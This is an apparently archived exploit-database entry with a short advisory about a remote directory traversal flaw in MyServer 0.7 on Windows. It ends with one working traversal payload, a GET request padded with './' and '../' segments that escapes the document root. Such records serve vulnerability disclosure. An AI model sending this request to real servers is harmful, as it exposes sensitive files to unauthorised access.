myserver 0.7 - Directory Traversal

EDB-ID:

24600


Author:

scrap

Type:

remote


Platform:

Windows

Date:

2004-09-15


source: https://www.securityfocus.com/bid/11189/info

MyServer is reported prone to a remote directory traversal vulnerability. This issue presents itself due to insufficient sanitization of user-supplied data. This vulnerability results in improper access to potentially sensitive files located outside of the document root of the web server. 

MyServer version 0.7 is reportedly affected by this issue, however, other versions may be vulnerable as well.

"GET ././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../"